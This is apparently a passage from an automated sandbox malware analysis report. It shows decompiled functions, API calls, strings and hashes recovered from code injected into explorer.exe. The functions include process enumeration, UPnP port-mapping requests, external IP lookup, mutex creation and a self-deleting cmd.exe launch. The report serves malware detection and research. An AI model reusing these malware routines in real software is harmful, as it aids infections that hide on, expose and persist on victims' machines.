				void* _t56;
				void* _t57;
				void* _t58;

				_v308 = 0;
				_v304 = 0xffffffff;
				_v312 = 0x22ea;
				while(0 != 0) {
				}
				_v304 =  *0x411a44(2, GetCurrentProcessId());
				if(_v304 != 0xffffffff) {
					_t46 =  &_v300;
					memset( &_v300, 0, 0x128);
					_t57 = _t56 + 0xc;
					_v300 = 0x128;
					_push( &_v300);
					_push(_v304);
					if( *0x411a70() != 0) {
						do {
							_v316 = 0;
							while(_v316 < 1) {
								_t41 = E003F8060(_t46,  *((intOrPtr*)(_t55 + _v316 * 4 - 0x134)));
								_t57 = _t57 + 4;
								_v320 = _t41;
								if(_v320 == 0) {
									L14:
									_t46 = _v316 + 1;
									_v316 = _v316 + 1;
									continue;
								} else {
									_t42 = E003F3DE0( &_v264, _v320);
									_t58 = _t57 + 8;
									if(_t42 != 0) {
										E003F8170( &_v320);
										_t57 = _t58 + 4;
										goto L14;
									} else {
										while(0 != 0) {
										}
										_v308 = 1;
										E003F8170( &_v320);
										_t57 = _t58 + 4;
									}
								}
								break;
							}
							if(_v308 == 0) {
								goto L16;
							}
							break;
							L16:
							_push( &_v300);
							_t46 = _v304;
							_push(_v304);
						} while ( *0x411a8c() != 0);
						CloseHandle(_v304);
					}
				}
				return _v308;
			}

0x003fae59
0x003fae63
0x003fae6d
0x003fae77
0x003fae7b
0x003fae8c
0x003fae99
0x003faea6
0x003faead
0x003faeb2
0x003faeb5
0x003faec5
0x003faecc
0x003faed5
0x003faedb
0x003faedb
0x003faef6
0x003faf0d
0x003faf12
0x003faf15
0x003faf22
0x003faf6e
0x003faeed
0x003faef0
0x00000000
0x003faf24
0x003faf32
0x003faf37
0x003faf3c
0x003faf66
0x003faf6b
0x00000000
0x003faf3e
0x003faf3e
0x003faf42
0x003faf44
0x003faf55
0x003faf5a
0x003faf5a
0x003faf3c
0x00000000
0x003faf22
0x003faf7a
0x00000000
0x00000000
0x00000000
0x003faf7c
0x003faf82
0x003faf83
0x003faf89
0x003faf90
0x003faf9f
0x003faf9f
0x003faed5
0x003fafae

APIs

GetCurrentProcessId.KERNEL32 ref: 003FAE7D
memset.MSVCRT(?,00000000,00000128), ref: 003FAEAD
CloseHandle.KERNEL32(000000FF), ref: 003FAF9F

Strings

", xrefs: 003FAE6D

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: CloseCurrentHandleProcessmemset
String ID: "
API String ID: 74355004-3847333454
Opcode ID: 9fdd134586a4d8aa963715185e167f91728c5aab4f4cc4b070f9954b9a79543d
Instruction ID: 742552423e22488ee89017f1ff87f22ccb8a61b5a5f6809e5dcfbf93f3107697
Opcode Fuzzy Hash: 9fdd134586a4d8aa963715185e167f91728c5aab4f4cc4b070f9954b9a79543d
Instruction Fuzzy Hash: 13314FF190071C9BDB21DB60DC84BEDB778AB09315F0046D8E60DAA280EB359F95CF96

Uniqueness

Uniqueness Score: 100.00%

Function 003F41B0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 76synchronizationUNIQUE

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000000,?), ref: 003F423F
GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 003F425E

Strings

D, xrefs: 003F41E4
c9?, xrefs: 003F41D8, 003F41DB

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: CodeExitObjectProcessSingleWait
String ID: D$c9?
API String ID: 1680577353-3060982787
Opcode ID: 903979ce48b64f794ade23d30468918129666f3876975874ba57ddd86f0d7db0
Instruction ID: dd664d45311e92152b56d04d3cb1f85bc4281b86f056006d0affd65de2578403
Opcode Fuzzy Hash: 903979ce48b64f794ade23d30468918129666f3876975874ba57ddd86f0d7db0
Instruction Fuzzy Hash: EC213970A0530CFAEF11CF94D94ABBF77B8AB44700F208429B705AB590D7B49A44CB95

Uniqueness

Uniqueness Score: 100.00%

Function 0150E1F0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68
stringUNIQUE

Download Yara Rule

C-Code - Quality: 53%

			E0150E1F0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, char* _a24, intOrPtr _a28) {
				int _v8;
				intOrPtr _v12;
				char _v20;
				char _v532;
				struct _OSVERSIONINFOA _v692;
				int _t26;
				void* _t51;
				void* _t52;

				_t26 = strlen(_a24);
				_t52 = _t51 + 4;
				_v8 = _t26;
				_v20 = 0;
				if((_a16 & 0x0000ffff) != 0x50) {
					E01513C30( &_v20, 8, ":%hu", _a16 & 0x0000ffff);
					_t52 = _t52 + 0x10;
				}
				E01513BA0( &_v692,  &_v692, 0, 0x9c);
				_v692.dwOSVersionInfoSize = 0x9c;
				GetVersionExA( &_v692);
				_push(_a20);
				_push(_v8);
				_push(_v692.dwMinorVersion);
				_push(_v692.dwMajorVersion);
				_push( &_v20);
				_push(_a12);
				_push(_a28);
				_v12 = E01513C30( &_v532, 0x200, "POST %s HTTP/%s\r\nHost: %s%s\r\nUser-Agent: Microsoft-Windows/%u.%u UPnP/1.0\r\nContent-Length: %d\r\nContent-Type: text/xml\r\nSOAPAction: \"%s\"\r\nConnection: Close\r\nCache-Control: no-cache\r\nPragma: no-cache\r\n\r\n", _a8);
				return E0150E2C0(_a4, _a4, _a24, _v8,  &_v532, _v12);
			}

0x0150e1fd
0x0150e202
0x0150e205
0x0150e208
0x0150e213
0x0150e225
0x0150e22a
0x0150e22a
0x0150e23b
0x0150e243
0x0150e254
0x0150e25d
0x0150e261
0x0150e268
0x0150e26f
0x0150e273
0x0150e277
0x0150e27b
0x0150e299
0x0150e2be

APIs

strlen.MSVCRT(00000000), ref: 0150E1FD
GetVersionExA.KERNEL32(0000009C), ref: 0150E254

Part of subcall function 01513C30: wvnsprintfA.SHLWAPI(?,?,?,00000000,?,?,?,jkfkdm,00000000), ref: 01513C5E
Part of subcall function 01513C30: lstrlenA.KERNEL32(00000000), ref: 01513C82

Strings

:%hu, xrefs: 0150E21A
POST %s HTTP/%sHost: %s%sUser-Agent: Microsoft-Windows/%u.%u UPnP/1.0Content-Length: %dContent-Type: text/xmlSOAPAction: "%s"Connection: CloseCache-Control: no-cachePragma: no-cache, xrefs: 0150E280

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: Versionlstrlenstrlenwvnsprintf
String ID: :%hu$POST %s HTTP/%sHost: %s%sUser-Agent: Microsoft-Windows/%u.%u UPnP/1.0Content-Length: %dContent-Type: text/xmlSOAPAction: "%s"Connection: CloseCache-Control: no-cachePragma: no-cache
API String ID: 2227220252-892929526
Opcode ID: 5cce71f3ae62d537fb394f3fff822239aae7c809fce59a853e64b3aba2ad2042
Instruction ID: fa31345b4fe1bc27284e5d91b6e933df9e43270c41a96bae9cbb9cc1233619ef
Opcode Fuzzy Hash: 5cce71f3ae62d537fb394f3fff822239aae7c809fce59a853e64b3aba2ad2042
Instruction Fuzzy Hash: F12142B6900219BBDB14DF94DC85EEF73B8BF98700F04458CF61997281E774AA54CBA1

Uniqueness

Uniqueness Score: 100.00%

Function 0150A537, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59
threadUNIQUE

Download Yara Rule

C-Code - Quality: 90%

			E0150A537(void* __ecx, void* __eflags, void* __fp0, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				void* _t8;
				void* _t12;
				void* _t15;
				void* _t23;
				void _t25;
				void _t33;

				_push(__ecx);
				_t8 = E01515B10(__ecx, __eflags, 0x15);
				_pop(_t15);
				if(_t8 != 0) {
					return _t8;
				}
				_v8 = 0;
				_v8 = E01515350(_t15, 0x21d1);
				_t23 = E015187B0(_t15, _t9);
				_t12 = E01515460( &_v8);
				if(_t23 == 0) {
					L7:
					return _t12;
				}
				CloseHandle(_t23);
				_t12 = E015088F6();
				_t25 = _t12;
				if(_t25 == 0) {
					_t12 = E0150678F(__fp0, "http://www.ip-adress.com", "IP address is: <strong>", "<");
					_t25 = _t12;
					_t33 = _t25;
				}
				if(_t33 > 0) {
					_t12 = E01513960(_t15, 0xc);
					if(_t12 != 0) {
						 *((intOrPtr*)(_t12 + 4)) = _a4;
						 *_t12 = _t25;
						 *((intOrPtr*)(_t12 + 8)) = _a8;
						_t12 = CreateThread(0, 0, E0150A4B8, _t12, 0, 0);
					}
				}
				goto L7;
			}

0x0150a53a
0x0150a53d
0x0150a542
0x0150a545
0x0150a5d3
0x0150a5d3
0x0150a554
0x0150a55d
0x0150a565
0x0150a56b
0x0150a575
0x0150a5d0
0x00000000
0x0150a5d1
0x0150a578
0x0150a57e
0x0150a583
0x0150a587
0x0150a598
0x0150a59d
0x0150a5a2
0x0150a5a2
0x0150a5a4
0x0150a5a8
0x0150a5b0
0x0150a5bd
0x0150a5c5
0x0150a5c7
0x0150a5ca
0x0150a5ca
0x0150a5b0
0x00000000

APIs

Part of subcall function 015187B0: CreateMutexA.KERNEL32(00000000,00000001,?,?,?,0150A565,00000000,000021D1), ref: 015187C3

CloseHandle.KERNEL32(00000000), ref: 0150A578
CreateThread.KERNEL32(00000000,00000000,Function_0000A4B8,00000000,00000000,00000000), ref: 0150A5CA

Part of subcall function 0150678F: lstrlenA.KERNEL32(0152A5A8,?,?,?,?,00000000,?,?,?,?,?,01506885,http://www.ip-adress.com,IP address is: ,0152A5A8,?), ref: 015067D0
Part of subcall function 0150678F: #11.WS2_32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0150680E

Strings

http://www.ip-adress.com, xrefs: 0150A593
IP address is: , xrefs: 0150A58E

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: Create$CloseHandleMutexThreadlstrlen
String ID: IP address is: $http://www.ip-adress.com
API String ID: 3106796127-3584306312
Opcode ID: f3a59b84e070e5dfc437b81463739314ed02f2a5666d6fb177c82d5d17d19a98
Instruction ID: ce33984a4ba63ce4af1bdce0898cca1e78d8618ffb518d18f5566cf1b3af71bc
Opcode Fuzzy Hash: f3a59b84e070e5dfc437b81463739314ed02f2a5666d6fb177c82d5d17d19a98
Instruction Fuzzy Hash: 71012B72B403167ADB336BA99C45D9F766CFFD2650B150119E905AF2C0FB758A009390

Uniqueness

Uniqueness Score: 100.00%

Function 00400460, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 003F4CB0: lstrlenW.KERNEL32(0040E1A0), ref: 003F4CD8

CoInitializeEx.OLE32(00000000,00000006), ref: 00400493
ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004004BC

Strings

, xrefs: 004004C5
open, xrefs: 004004B5

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: ExecuteInitializeShelllstrlen
String ID: $open
API String ID: 1602038812-119239145
Opcode ID: f8811ea08e2932200777ab7703181e26d930f7a6c0e6ed20923a7cb43d99fccf
Instruction ID: fce4ce0db56e3584ba69dac65b00d87e0199da4981a5d1be8ddc6d9245f6a61a
Opcode Fuzzy Hash: f8811ea08e2932200777ab7703181e26d930f7a6c0e6ed20923a7cb43d99fccf
Instruction Fuzzy Hash: C61186B5D44208FBEB10EFD0DD06BAE7774EB00714F2042AAEA157A2C0D6B45A048B9A

Uniqueness

Uniqueness Score: 6.12%

Function 003FEE20, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 46
UNIQUE

Download Yara Rule

C-Code - Quality: 30%

			E003FEE20() {
				short _v516;
				char _v520;
				signed int _t6;
				signed int _t7;
				signed int _t16;

				_t6 =  *0x411408; // 0x0
				_t7 = _t6 & 0x00000001;
				if(_t7 != 0) {
					L2:
					while(0 != 0) {
					}
					return _t7 | 0xffffffff;
				}
				_t16 =  *0x411408; // 0x0
				_t17 = _t16 & 0x00000010;
				if((_t16 & 0x00000010) == 0) {
					_v520 = E003F7F40(_t17, 0x1fc7);
					_push("C:\Windows\explorer.exe");
					E003F3B30( &_v516, 0x200, _v520, "C:\Windows");
					while(0 != 0) {
					}
					E003F8170( &_v520);
					ShellExecuteW(0, 0, L"cmd.exe",  &_v516, 0, 0);
					return 0;
				}
				goto L2;
			}

0x003fee29
0x003fee2e
0x003fee31
0x00000000
0x003fee3e
0x003fee42
0x00000000
0x003fee44
0x003fee33
0x003fee39
0x003fee3c
0x003fee56
0x003fee5c
0x003fee79
0x003fee81
0x003fee85
0x003fee8e
0x003feeaa
0x00000000
0x003feeb0
0x00000000

APIs

ShellExecuteW.SHELL32(00000000,00000000,cmd.exe,?,00000000,00000000), ref: 003FEEAA

Strings

C:\Windows, xrefs: 003FEE61
cmd.exe, xrefs: 003FEEA1
C:\Windows\explorer.exe, xrefs: 003FEE5C

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: ExecuteShell
String ID: C:\Windows$C:\Windows\explorer.exe$cmd.exe
API String ID: 587946157-161179364
Opcode ID: ca9b34a657dcb08a2aff27378f00822247d9119bc520231928e57bdc39290aa3
Instruction ID: 49a25f96dae9b63457d0eb42ba9780afb6fa8a5458643ba214641e6f5b4d6f0e
Opcode Fuzzy Hash: ca9b34a657dcb08a2aff27378f00822247d9119bc520231928e57bdc39290aa3
Instruction Fuzzy Hash: 8A0149B1E4030C6AFB21E764BD07FB573289B20700F1841B5F7159A1E2EAB16E408B9A

Uniqueness

Uniqueness Score: 100.00%

Function 003FFBA9, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42
stringfileUNIQUE

Download Yara Rule

C-Code - Quality: 37%

			E003FFBA9() {
				void* _t30;

				while(0 != 0) {
				}
				 *((intOrPtr*)(_t30 - 4)) = 0xffffffff;
				lstrcpynW(_t30 - 0x8b8, "C:\Windows\explorer.exe", 0x104);
				 *(_t30 - 0x6ac) = E003F7F40(_t30 - 0x8b8, 0x5bf);
				lstrcatW(_t30 - 0x8b8,  *(_t30 - 0x6ac));
				E003F8170(_t30 - 0x6ac);
				if(E003FE080(_t30 - 0x6ac, _t30 - 0x8b8) != 0) {
					DeleteFileW(_t30 - 0x8b8);
				}
				E003FEE20();
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0x10));
				return 0;
			}

0x003ffbac
0x003ffbb0
0x003ffbb2
0x003ffbca
0x003ffbdd
0x003ffbf1
0x003ffbfe
0x003ffc17
0x003ffc20
0x003ffc20
0x003ffc26
0x003ffc30
0x003ffc3d

APIs

lstrcpynW.KERNEL32(?,C:\Windows\explorer.exe,00000104), ref: 003FFBCA
lstrcatW.KERNEL32(?,?), ref: 003FFBF1
DeleteFileW.KERNEL32(?), ref: 003FFC20

Strings

C:\Windows\explorer.exe, xrefs: 003FFBBE

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: DeleteFilelstrcatlstrcpyn
String ID: C:\Windows\explorer.exe
API String ID: 3673347326-2858086631
Opcode ID: 74206b9bb3940d66004dc1d91a0788f34557e9aebd051a96ae146de9a2873cc9
Instruction ID: 068e06e62e17288440a77c859c73f872cf10abed9e1c92fcb176b3c2dd2a85b3
Opcode Fuzzy Hash: 74206b9bb3940d66004dc1d91a0788f34557e9aebd051a96ae146de9a2873cc9
Instruction Fuzzy Hash: 190175F2D0021D9FDB51EB60DC45AEE7379EF44310F0046B5EA59A6190EF319A94CF91

Uniqueness

Uniqueness Score: 100.00%

Function 0150633E, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25
UNIQUE

Download Yara Rule

C-Code - Quality: 75%

			E0150633E(void* __eflags) {
				char _v68;
				void* _t9;

				_push(GetCurrentProcessId());
				E01513C30( &_v68, 0x40, "2%s%u", "jkfkdm");
				_t9 = CreateEventA(0, 0, 0,  &_v68);
				 *0x15379b0 = _t9;
				return 0 | _t9 != 0x00000000;
			}

0x0150634a
0x0150635b
0x0150636d
0x0150637a
0x01506382

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,015063B2), ref: 01506344

Part of subcall function 01513C30: wvnsprintfA.SHLWAPI(?,?,?,00000000,?,?,?,jkfkdm,00000000), ref: 01513C5E
Part of subcall function 01513C30: lstrlenA.KERNEL32(00000000), ref: 01513C82

CreateEventA.KERNEL32(00000000,00000000,00000000,?), ref: 0150636D

Strings

jkfkdm, xrefs: 0150634B
2%s%u, xrefs: 01506350

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: CreateCurrentEventProcesslstrlenwvnsprintf
String ID: 2%s%u$jkfkdm
API String ID: 3949034518-1367761749
Opcode ID: 22202b2c14ac23fd2968d422f71c2eb3ac72e364118de63fb071b3c64b1243f7
Instruction ID: f5ef217168aa4014dbe74ab83fa2b77a148e2c5c6e5cf3febf1665064e6993d5
Opcode Fuzzy Hash: 22202b2c14ac23fd2968d422f71c2eb3ac72e364118de63fb071b3c64b1243f7
Instruction Fuzzy Hash: AFE086F3B443096BE724ABA59C1BF6D32AC7B04A04F410028F616EF5C4E7A4D8188765

Uniqueness

Uniqueness Score: 100.00%

Function 015081D6, Relevance: 6.4, APIs: 5, Instructions: 185
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E015081D6(void* __ebx, void* __ecx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				struct _CRITICAL_SECTION* _v32;
				struct _CRITICAL_SECTION* _t84;
				char _t87;
				struct _CRITICAL_SECTION* _t88;
				char _t90;
				struct _CRITICAL_SECTION* _t104;
				signed int _t108;
				signed int _t113;
				struct _CRITICAL_SECTION* _t114;
				signed int _t117;
				signed int _t122;
				void* _t123;
				void* _t137;
				void* _t142;
				signed int _t153;
				void* _t156;
				void* _t157;

				_t124 = __ecx;
				_v8 = _v8 | 0xffffffff;
				_push(__ebx);
				_v24 = 0;
				_v12 = 0;
				_t153 = 0;
				_v20 = 0;
				_v16 = 0;
				E01513AC0(__ecx,  &_v32, _a4, 8);
				_t84 = _v32;
				_t157 = _t156 + 0xc;
				if( *((intOrPtr*)(_t84 + 0x638)) == 0 ||  *((intOrPtr*)(_t84 + 0x63c)) <= 0) {
					L5:
					_t87 = E01507B2A(_t124,  *((intOrPtr*)(_v28 + 4)),  &_v24);
					_t127 = _v24;
					_v20 = _t87;
					_t88 = _v32;
					if(_v24 > 0 ||  *((intOrPtr*)(_t88 + 0x64c)) > 0) {
						_t90 = E01507883( *((intOrPtr*)(_t88 + 0x64c)), _t127, _v20,  *((intOrPtr*)(_t88 + 0x648)),  &_v12);
						_t157 = _t157 + 0xc;
					} else {
						_t90 = E015077FA(_t127,  &_v12);
					}
					_v16 = _t90;
					_a4 = 0;
					_t166 = _v12;
					if(_v12 > 0) {
						while(1) {
							_t108 = E0150805D(_v32, _v28, _t166,  *((intOrPtr*)(_v16 + _a4 * 4)));
							_v8 = _t108;
							if(_t108 == 0) {
								goto L19;
							}
							_t134 = _v32;
							if(_t153 <  *((intOrPtr*)(_v32 + 0x63c))) {
								_t122 = _t153 << 0xa;
								while(1) {
									_t113 = E01507F31(_t122, _t134, _v28,  *((intOrPtr*)(_t134 + 0x638)) + _t122,  *((intOrPtr*)(_t134 + 0x638)) + _t122 + 0x200);
									_t157 = _t157 + 0x10;
									_v8 = _t113;
									if(_t113 == 0) {
										break;
									}
									_t134 = _v32;
									_t153 = _t153 + 1;
									_t122 = _t122 + 0x400;
									if(_t153 <  *((intOrPtr*)(_v32 + 0x63c))) {
										continue;
									} else {
									}
									goto L18;
								}
								EnterCriticalSection(_v32);
								_t114 = _v32;
								_t137 = (_t153 << 0xa) +  *((intOrPtr*)(_t114 + 0x638));
								__eflags = _t137;
								 *((intOrPtr*)(_t114 + 0x61c))(_t114,  *((intOrPtr*)(_v28 + 4)), _t137, _t137 + 0x200, 0);
								_t157 = _t157 + 0x14;
								LeaveCriticalSection(_v32);
							}
							L18:
							_a4 = _a4 + 1;
							if(_a4 < _v12) {
								continue;
							}
							goto L19;
						}
					}
					L19:
					if(_v8 > 0) {
						EnterCriticalSection(_v32);
						_push(((0 | _v8 == 0x00000003) - 0x00000001 & 0x00000003) + 3);
						_push(0);
						_push(0);
						_push( *((intOrPtr*)(_v28 + 4)));
						_t104 = _v32;
						goto L21;
					}
				} else {
					_t123 = 0;
					while(1) {
						_t124 =  *((intOrPtr*)(_t84 + 0x638)) + _t123;
						_t117 = E01507F31(_t123, _t84, _v28,  *((intOrPtr*)(_t84 + 0x638)) + _t123,  *((intOrPtr*)(_t84 + 0x638)) + _t123 + 0x200);
						_t157 = _t157 + 0x10;
						_v8 = _t117;
						if(_t117 == 0) {
							break;
						}
						_t84 = _v32;
						_t153 = _t153 + 1;
						_t123 = _t123 + 0x400;
						if(_t153 <  *((intOrPtr*)(_t84 + 0x63c))) {
							continue;
						} else {
							goto L5;
						}
						goto L22;
					}
					EnterCriticalSection(_v32);
					_t104 = _v32;
					_t142 =  *((intOrPtr*)(_t104 + 0x638)) + (_t153 << 0xa);
					_push(0);
					_push(_t142 + 0x200);
					_push(_t142);
					_push( *((intOrPtr*)(_v28 + 4)));
					L21:
					 *((intOrPtr*)(_t104 + 0x61c))(_t104);
					LeaveCriticalSection(_v32);
				}
				L22:
				if(_v20 != 0) {
					E015175C0( &_v20,  &_v24);
				}
				if(_v16 != 0) {
					E015175C0( &_v16,  &_v12);
				}
				return 0;
			}

0x015081d6
0x015081dc
0x015081e0
0x015081ee
0x015081f1
0x015081f4
0x015081f6
0x015081f9
0x015081fc
0x01508201
0x01508204
0x0150820d
0x0150824e
0x01508258
0x0150825f
0x01508262
0x01508265
0x0150826a
0x015082be
0x015082c3
0x01508274
0x01508278
0x0150827d
0x015082c6
0x015082c9
0x015082cc
0x015082cf
0x015082d5
0x015082e4
0x015082ea
0x015082ef
0x00000000
0x00000000
0x015082f5
0x01508300
0x01508304
0x01508307
0x0150831b
0x01508320
0x01508323
0x01508328
0x00000000
0x00000000
0x0150832a
0x0150832d
0x0150832e
0x0150833a
0x00000000
0x00000000
0x0150833c
0x00000000
0x0150833a
0x01508341
0x01508347
0x0150834f
0x0150834f
0x01508365
0x0150836b
0x01508371
0x01508371
0x01508377
0x01508377
0x01508380
0x00000000
0x00000000
0x00000000
0x01508380
0x015082d5
0x01508386
0x01508389
0x0150838e
0x015083a4
0x015083a8
0x015083a9
0x015083aa
0x015083ad
0x00000000
0x015083ad
0x01508217
0x01508217
0x01508219
0x0150821f
0x0150822d
0x01508232
0x01508235
0x0150823a
0x00000000
0x00000000
0x0150823c
0x0150823f
0x01508240
0x0150824c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0150824c
0x01508283
0x01508289
0x01508295
0x01508297
0x0150829e
0x0150829f
0x015082a3
0x015083b0
0x015083b1
0x015083bd
0x015083bd
0x015083c3
0x015083c6
0x015083d0
0x015083d6
0x015083dd
0x015083e7
0x015083ed
0x015083f1

APIs

EnterCriticalSection.KERNEL32(?), ref: 01508283
EnterCriticalSection.KERNEL32(?), ref: 01508341
LeaveCriticalSection.KERNEL32(?), ref: 01508371
EnterCriticalSection.KERNEL32(?), ref: 0150838E
LeaveCriticalSection.KERNEL32(?), ref: 015083BD

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: CriticalSection$Enter$Leave
String ID:
API String ID: 2801635615-0
Opcode ID: a1a4453748aaee75243d28a049165e7aad6e3aff738b3495792bbbcff386c3d9
Instruction ID: 940019e95836113d1667f9fc5e78772a3084962f86d40dc4075b170182b6ba33
Opcode Fuzzy Hash: a1a4453748aaee75243d28a049165e7aad6e3aff738b3495792bbbcff386c3d9
Instruction Fuzzy Hash: 40617D72D00209AFCB12DFD8CC84DEEBBB5FF88310F198569E515AB291E7319A51CB90

Uniqueness

Uniqueness Score: 2.98%

Function 0151C820, Relevance: 6.4, APIs: 5, Instructions: 127
stringCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0151C820(CHAR** _a4, CHAR* _a8, CHAR* _a12) {
				int _v8;
				signed int _v12;
				CHAR* _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				CHAR* _t70;
				CHAR* _t73;
				void* _t125;
				void* _t126;

				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v28 = 0;
				_v24 = 0;
				_v16 =  *_a4;
				_v28 = lstrlenA( *_a4) + 1;
				_v8 = lstrlenA(_a8);
				_v20 = lstrlenA(_a12);
				while(1) {
					_t70 = E01513DD0(_v16, _a8);
					_t125 = _t125 + 8;
					_v16 = _t70;
					if(_v16 == 0) {
						break;
					}
					_v12 = _v12 + 1;
					_v16 =  &(_v16[_v8]);
				}
				if(_v12 != 0) {
					if(_v20 > _v8) {
						_v24 = (_v20 - _v8) * _v12 + _v28;
						E01513A40(_v28, _a4, _v28, _v24);
						_t125 = _t125 + 0xc;
					}
					_v16 =  *_a4;
					while(1) {
						_t73 = E01513DD0(_v16, _a8);
						_t126 = _t125 + 8;
						_v16 = _t73;
						if(_v16 == 0) {
							break;
						}
						E01513B00( &(_v16[_v8]),  &(_v16[_v20]),  &(_v16[_v8]), lstrlenA( &(_v16[_v8])));
						E01513AC0(_v20, _v16, _a12, _v20);
						_t125 = _t126 + 0x18;
						while(0 != 0) {
						}
						_v16 =  &(_v16[_v20]);
					}
					if(_v8 > _v20) {
						_v32 = (_v8 - _v20) * _v12;
						E01513BA0( &(( *_a4)[lstrlenA( *_a4)]) - _v32,  &(( *_a4)[lstrlenA( *_a4)]) - _v32, 0, _v32);
					}
					return  *_a4;
				}
				return 0;
			}

0x0151c826
0x0151c82d
0x0151c834
0x0151c83b
0x0151c842
0x0151c84e
0x0151c860
0x0151c86d
0x0151c87a
0x0151c87d
0x0151c885
0x0151c88a
0x0151c88d
0x0151c894
0x00000000
0x00000000
0x0151c89c
0x0151c8a5
0x0151c8a5
0x0151c8ae
0x0151c8bd
0x0151c8cc
0x0151c8db
0x0151c8e0
0x0151c8e0
0x0151c8e8
0x0151c8eb
0x0151c8f3
0x0151c8f8
0x0151c8fb
0x0151c902
0x00000000
0x00000000
0x0151c920
0x0151c934
0x0151c939
0x0151c93c
0x0151c940
0x0151c948
0x0151c948
0x0151c953
0x0151c95f
0x0151c97f
0x0151c984
0x00000000
0x0151c98a
0x00000000

APIs

lstrlenA.KERNEL32(00000000), ref: 0151C857
lstrlenA.KERNEL32(?), ref: 0151C867
lstrlenA.KERNEL32(00000000), ref: 0151C874
lstrlenA.KERNEL32(00000000), ref: 0151C90B
lstrlenA.KERNEL32(00000000,00000000,?), ref: 0151C96E

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID:
API String ID: 1659193697-0
Opcode ID: ec61790e6e2fcd2cb664852c37ec0bbaa42dc59ec30e6cf448a1843047ab89b9
Instruction ID: a515bbf36c8a5911b13382cd3875e4a0fe17fddfcdd10552e43f75244b2d451c
Opcode Fuzzy Hash: ec61790e6e2fcd2cb664852c37ec0bbaa42dc59ec30e6cf448a1843047ab89b9
Instruction Fuzzy Hash: 4B511BB5D00209EFDB04DFE8C994AAEBBB5FF88314F148598E515AB348D735AA44CF90

Uniqueness

Uniqueness Score: 0.02%

Function 0150C970, Relevance: 6.4, APIs: 2, Strings: 2, Instructions: 358
UNIQUE

Download Yara Rule

C-Code - Quality: 25%

			E0150C970(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _t203;
				intOrPtr _t214;
				intOrPtr _t222;
				void* _t224;
				intOrPtr _t227;
				intOrPtr _t232;
				intOrPtr _t235;
				intOrPtr _t244;
				intOrPtr _t247;
				intOrPtr _t250;
				void* _t257;
				intOrPtr _t267;
				intOrPtr _t283;
				intOrPtr _t296;
				intOrPtr _t299;
				intOrPtr _t317;
				intOrPtr _t333;
				intOrPtr _t347;
				intOrPtr _t354;
				intOrPtr _t364;
				void* _t400;

				while(1) {
					_t203 = _a4;
					_t2 = _t203 + 4; // 0xccc35de5
					if( *((intOrPtr*)(_a4 + 8)) >=  *_t2 - 1) {
						break;
					}
					_t6 = _a4 + 8; // 0xcccccccc
